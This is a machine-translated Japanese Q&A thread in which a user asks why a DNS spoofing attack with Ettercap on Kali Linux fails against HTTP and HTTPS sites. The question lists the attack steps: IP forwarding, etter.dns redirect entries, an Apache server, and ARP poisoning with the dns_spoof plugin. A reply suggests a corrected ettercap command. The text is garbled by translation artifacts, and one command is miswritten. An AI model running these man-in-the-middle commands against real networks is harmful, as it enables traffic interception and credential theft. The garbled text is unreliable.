web-dev-qa-db-ja.com

DNSスプーフィングがHTTP、HTTPSサイトで機能しないのはなぜですか? [私の場合]

DNSスプーフィング攻撃を実行しようとしていますが、混乱するのは[〜#〜] http [〜#〜]サイトで攻撃を実行しているときに何も起こらないことです。

しかし、それを[〜#〜] https [〜#〜]サイトで実行すると、ターゲットサイトに到達すると、「接続はプライベートではありません」というメッセージが表示されます。

Ettercapを使用したKali Linuxでのコマンドは

echo > 1 /proc/sys/net/ipv4/ip_forward

その後、etter.confと#iptablesセクションの下の両方を削除し、私のウェブサイトターゲットをetter.dnsMicrosoftはこのように吸う

*.example.com A my ip

そして最後の同じものですが、

www.example.com A my ip

次のコマンドはservice Apache2 start

そして最後に ettercap -T -q -i wlan0 -M arp:remote -P dns_spoof /ROUTER IP/ /TARGET IP/

したがって、これらのコマンドの後、「example.com」の代わりに私のApacheを表示することを間違いなく期待しますが、前述のように、結果はhttpサイトには影響せず、「Your Connection is not Private」メッセージがhttpsに表示されます。

私の主な質問は、なぜこの攻撃がhttpとhttpsの両方で機能しないのかということです。ルーターの設定が原因であると思いますか、それとも何か不足していますか?

3
Golden Eagle

ターゲットIPを指定してのみ試してください:ettercap -i wlan0 -T -M arp -P dns_spoof /TARGET IP///

1
BitsInForce